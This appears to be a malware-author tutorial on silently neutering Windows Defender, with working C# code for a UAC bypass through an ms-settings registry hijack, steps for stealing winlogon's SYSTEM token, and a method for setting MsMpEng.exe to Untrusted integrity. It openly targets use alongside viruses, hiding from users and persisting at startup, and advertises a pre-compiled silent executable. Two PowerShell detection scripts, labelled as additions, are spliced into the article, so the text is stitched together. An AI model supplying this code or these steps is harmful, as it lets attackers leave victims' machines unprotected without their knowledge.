Windows Defender… There is so much pain in that word. If you have had even a remote connection to the spread of malware, this antivirus has most likely already caused you a lot of inconvenience.
With the most extensive cloud base in the world, this AV could not escape the attention of crypter authors and malware developers, each of whom has an interest in bypassing it.
The most primitive idea that occurs to everyone is to try to kill the antivirus at the root. However, the system itself prevents this; it won’t work that easily.
It has been shown that this is possible through the use of “Set-Preference”. Unfortunately, because that script has been used so widely, the trick can no longer be pulled off against present-day proactive protection.
… and actually, that’s it. That is the full extent of the superficial information on how to disable Defender.
In this article I want to talk about a method that many users already know about, but that has not been widely publicized to this day.
We will talk about privilege tokens and manipulating them in order to disable Windows Defender.
CHAPTER 1: PREPARATION
Let’s start, as expected, with some tedious theory. Without it, the essence of what follows will not be clear, so I will keep it as brief and understandable as possible.
Privilege tokens are permissions that the system grants to a process.
For example, if a process holds the “SeShutdownPrivilege”, it has the right to shut down your computer. If your program does not hold that privilege, it cannot perform that action.
Windows Defender uses its privileges to check files, for example “SeRestorePrivilege”.
From this we conclude that if you strip the antivirus process of the privileges it needs to check files, it becomes useless and cannot perform that very check.
Any explanation becomes clearer when dry text is turned into a visualization. For that reason, I suggest downloading Process Hacker and looking with your own eyes at the tokens available to a particular process.
The process responsible for Windows Defender is MsMpEng.exe; we need to find it in the list and open the Token tab.
Here we notice that the process holds many different privileges that are of key importance to it. As you have probably guessed, we will be disabling these privileges.
This concludes the theoretical part; now we begin implementing the POC. At the very start we are already faced with two problems.
- The MsMpEng.exe process runs as SYSTEM. To edit its token we need to be the “NT AUTHORITY\SYSTEM” user.
- To become SYSTEM we need to elevate, which in turn is only possible from the administrator level.
The solution is the following scheme:
Yes, yes, we will have to restart the process as many as 2 times to get all the necessary rights.
- We get administrator rights using a UAC bypass.
- Then we get SYSTEM level by stealing a token and starting our process with the stolen token.
Well, let’s start building it.
CHAPTER 2: ELEVATING RIGHTS
There are many UAC bypass implementations; choose whichever suits you. In this article I will use the most common method, editing the registry.
Its essence is that the system application computerdefaults.exe, at startup, reads the registry key “Software\Classes\ms-settings\shell\open\command”. Our task is to point this key at our application.
Now, when computerdefaults.exe starts, it opens our application, but with administrator rights. Edit the registry and then launch the application via cmd.
```
using System.Diagnostics;
using System.Reflection;
using Microsoft.Win32;

// Path of the currently running assembly: the value the hijacked key will point at.
string execPath = Assembly.GetEntryAssembly().Location;

// Create the per-user ms-settings handler key, set its default value to our
// executable and add the DelegateExecute value described in the text.
Registry.CurrentUser.CreateSubKey("Software\\Classes\\ms-settings\\shell\\open\\command");
Registry.CurrentUser.CreateSubKey("Software\\Classes\\ms-settings\\shell\\open\\command").SetValue("", execPath, RegistryValueKind.String);
Registry.CurrentUser.CreateSubKey("Software\\Classes\\ms-settings\\shell\\open\\command").SetValue("DelegateExecute", 0, RegistryValueKind.DWord);
Registry.CurrentUser.Close();

// Launch computerdefaults.exe through a hidden cmd window.
Process process = new System.Diagnostics.Process();
ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();
startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
startInfo.FileName = "cmd.exe";
startInfo.Arguments = @"/C computerdefaults.exe";
process.StartInfo = startInfo;
process.Start();
```
At this stage we have already launched our process as administrator, without any prompts or a UAC shield icon on the executable.
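The registry override above leaves a very specific trace: on a clean system the ms-settings handler lives under HKLM\Software\Classes, and the per-user copy under HKCU normally does not exist at all. The following PowerShell script is an added defensive check, not code from the article or its archive; it reports whether that per-user key is present, shows what it points at, and optionally removes it. The `-Remediate` switch, the result object and the output format are this script's own design.

```powershell
# Added detection/remediation check (not part of the original article).
# Run in the context of the user whose HKCU hive should be inspected.
param(
    [switch]$Remediate
)

$HijackKey = 'HKCU:\Software\Classes\ms-settings\shell\open\command'

function Test-MsSettingsHijack {
    # Absent key is the normal, clean state.
    if (-not (Test-Path -LiteralPath $HijackKey)) {
        return [pscustomobject]@{ Present = $false; Command = $null; DelegateExecute = $null }
    }
    # PowerShell exposes a key's default value under the '(default)' property name.
    $props = Get-ItemProperty -LiteralPath $HijackKey
    [pscustomobject]@{
        Present         = $true
        Command         = $props.'(default)'
        DelegateExecute = $props.DelegateExecute
    }
}

$result = Test-MsSettingsHijack
if (-not $result.Present) {
    Write-Output "OK: $HijackKey is absent."
    return
}

Write-Warning "Suspicious: $HijackKey exists in the user hive."
Write-Warning "  Default (command): '$($result.Command)'"
Write-Warning "  DelegateExecute  : '$($result.DelegateExecute)'"
Write-Warning "  The executable named in the command is the first thing to examine."

if ($Remediate) {
    # Remove the whole per-user ms-settings override. The system handler under
    # HKLM\Software\Classes is untouched, so Settings keeps working normally.
    Remove-Item -LiteralPath 'HKCU:\Software\Classes\ms-settings' -Recurse -Force
    Write-Output 'Removed HKCU:\Software\Classes\ms-settings.'
}
```

Because the key is per-user, the check has to be run (or the HKCU path adapted to the loaded hive) for every profile on the machine; a result of "absent" for one user says nothing about the others.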
CHAPTER 2.1: I AM THE SYSTEM!
As already mentioned, the Windows Defender process runs as NT AUTHORITY\SYSTEM. As an ordinary process, we cannot edit a process that runs on behalf of the system.
In a nutshell, here is what happens:
Windows has a process called winlogon; it runs as SYSTEM and is responsible for user logon. We will duplicate this process’s token and run our own program with the stolen token.
- OpenProcessToken() — open the process token with TOKEN_DUPLICATE access (this gives us the token handle)
- STARTUPINFO — set the parameters for starting the process
- DuplicateTokenEx() — duplicate the winlogon token and keep the copy
- CreateProcessWithTokenW() — start our .exe with the token stolen from winlogon
- Congratulations, you are great
Let’s sum up the interim result: we forced our program to run as SYSTEM while bypassing UAC.
- Then a UAC bypass is applied and a second process with elevated rights is opened
- The second process, in turn, launches the final .exe, which has administrator rights and runs on behalf of the system.
At this point we have met all the conditions for editing the privileges of a system process and are ready to implement disabling Windows Defender.
CHAPTER 3: DISABLE ANTI-VIRUS
Let’s go back to the theoretical chapter for a second and recall why we did all this elevation. Our task is to strip the antivirus process of the privileges that allow it to check files for malware.
There are two ways to solve this problem: remove the entire list of privileges manually, or set the integrity level to “Untrusted”. During testing it turned out that both solutions are interchangeable and lead to the same result. Therefore we will take the path of least resistance and set the integrity level to “Untrusted”.
As in the previous steps, we will use a diagram to explain what comes next. The algorithm is as follows:
- OpenProcess() – get a handle to the process with “QueryLimitedInformation” access
- OpenProcessToken() – open the process token with TOKEN_ALL_ACCESS
- TOKEN_MANDATORY_LABEL – fill in the structure that we will set on the process token
- ConvertStringSidToSid() – get the SID for “ML_UNTRUSTED”
- StructureToPtr() – marshal the structure into the format the call requires
- SetTokenInformation() – set the “Untrusted” integrity level on the process.
The SID value of “ML_UNTRUSTED” can be found in the Microsoft documentation at this link: https://docs.microsoft.com/en-us/op…/ms-dtyp/81d92bba-d22b-4a8c-908a-554ab29148ab
That is the end of everything we needed to do to remove the privileges from the process.
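The important property of the technique above, from the defender's side, is that the service keeps running and status cmdlets keep reporting it as enabled; only its ability to act is gone. A check that only asks Defender how it is doing therefore proves nothing. The following PowerShell script is an added example, not code from the article: it records what `Get-MpComputerStatus` reports and then performs a functional test by dropping the industry-standard EICAR test file into `%TEMP%` and watching whether real-time protection removes it. The timeout, the result object and the treatment of a blocked write are this script's own design.

```powershell
# Added functional check of Defender real-time protection (not part of the original article).
param(
    [int]$TimeoutSeconds = 10
)

# The EICAR test string is assembled from two halves only so that this script
# file itself is not quarantined as the test pattern when saved to disk.
$EicarPart1 = 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-'
$EicarPart2 = 'ANTIVIRUS-TEST-FILE!$H+H*'

function Test-DefenderRealTimeProtection {
    param([int]$Timeout)

    # What Defender claims about itself; in the tampered scenario this still says "enabled".
    $reported = Get-MpComputerStatus
    $canary   = Join-Path $env:TEMP ('defender-canary-{0}.txt' -f [guid]::NewGuid())

    try {
        # ASCII, no BOM, no trailing newline, as the EICAR specification requires.
        [System.IO.File]::WriteAllText($canary, $EicarPart1 + $EicarPart2, [System.Text.Encoding]::ASCII)
    } catch {
        # A working scanner may block the write itself; that counts as effective protection.
        return [pscustomobject]@{
            ReportedRealTime = $reported.RealTimeProtectionEnabled
            Effective        = $true
            Detail           = 'write blocked'
        }
    }

    # Give the scanner a bounded amount of time to quarantine the file.
    $deadline = (Get-Date).AddSeconds($Timeout)
    while ((Test-Path -LiteralPath $canary) -and ((Get-Date) -lt $deadline)) {
        Start-Sleep -Milliseconds 500
    }
    $removed = -not (Test-Path -LiteralPath $canary)

    # Clean up if the scanner did not, so the test leaves nothing behind.
    if (-not $removed) {
        Remove-Item -LiteralPath $canary -Force -ErrorAction SilentlyContinue
    }

    $detail = if ($removed) { 'canary removed by scanner' } else { 'canary survived' }
    [pscustomobject]@{
        ReportedRealTime = $reported.RealTimeProtectionEnabled
        Effective        = $removed
        Detail           = $detail
    }
}

$r = Test-DefenderRealTimeProtection -Timeout $TimeoutSeconds
$r | Format-List

# The interesting outcome is the contradiction: reported ON, but no action taken.
if ($r.ReportedRealTime -and -not $r.Effective) {
    Write-Warning 'Defender reports real-time protection ON but did not act on the test file: treat the engine as tampered with and investigate.'
}
```

Scheduling this check periodically (and alerting on the reported-ON/not-effective combination) catches the effect of the technique regardless of how the engine was neutered, which is more robust than looking for any one implementation of it. The mismatch is also a good reason to compare the MsMpEng.exe token in Process Hacker, as in Chapter 1, against a known-good machine.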
So, let’s ask ourselves the rhetorical question: “Why did I do this?”
- The method of disabling WD via a script is dead. The method presented in this article can currently be implemented without defects (!!!)
- This method does not remove the antivirus from the system; it simply prevents it from performing its functions. The user will not be alarmed by a sudden system notification about a disabled antivirus. He will not see any icons on the panel. Nothing changes for him; he will not even suspect that his system has been left unprotected.
- A similar trick can be tried with other antiviruses; in this article Defender is taken as the most common.
The disadvantages of this idea:
- We need administrator rights (as with the other methods, but come on). If the user has them, we work around this problem via the UAC bypass.
- Privilege tokens are re-issued to the process after the system restarts. Therefore, if your virus stays in the system for a long time, add disabling WD to startup.
After carefully rereading the entire list of pros and cons, I conclude that this method has every chance of being used in combat. Its main advantage is that the method is not burned by Defender itself and will not be removed when it lands on the system.
- Disable WD.zip – archive with the C sources
- Silent – a ZIP archive containing a pre-compiled .exe that you can download along with the virus. It is completely invisible, runs without a console and disappears from the task manager.
THE NOTE
This article is for informational purposes only. We do not encourage you to commit any hacking. Everything you do is your own responsibility.
TOX : 340EF1DCEEC5B395B9B45963F945C00238ADDEAC87C117F64F46206911474C61981D96420B72 Telegram : @DevSecAS